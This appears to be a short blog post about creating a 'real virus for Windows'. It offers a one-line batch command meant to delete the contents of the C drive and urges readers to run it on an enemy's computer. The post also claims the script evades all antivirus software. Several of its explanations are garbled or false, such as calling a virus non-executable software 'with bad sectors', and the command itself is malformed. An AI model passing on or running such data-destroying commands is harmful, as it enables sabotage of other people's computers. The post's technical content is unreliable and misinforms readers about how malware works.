In this post, I am going to show you how to create a real virus for Windows. In computers, a virus is a program or programming code that replicates by being copied or initiating its copying to another program, computer boot sector, or document.
The virus can be transmitted as attachments to an email note or in a downloaded file, or be present on a diskette or CD.
In simple words, a Virus is non-executable malicious software with bad sectors, and if you try to execute a virus file, this will definitely harm your computer.
So in this post, we’re talking about how to create a real virus on your laptop and it also can’t be detected by any antivirus.
Related Post:
What is the working of this virus?
This virus will delete the C drive completely so be careful we request you to use this trick for the purpose of knowledge and if you have an enemy just try on his computer.
How to Create a Real Virus for Windows
@Echo offDel C:*.* ly
WARNING: Please do not try to run on your own computer or else it will delete all the content of your C drive.
Can i use this script in linux?
Nope…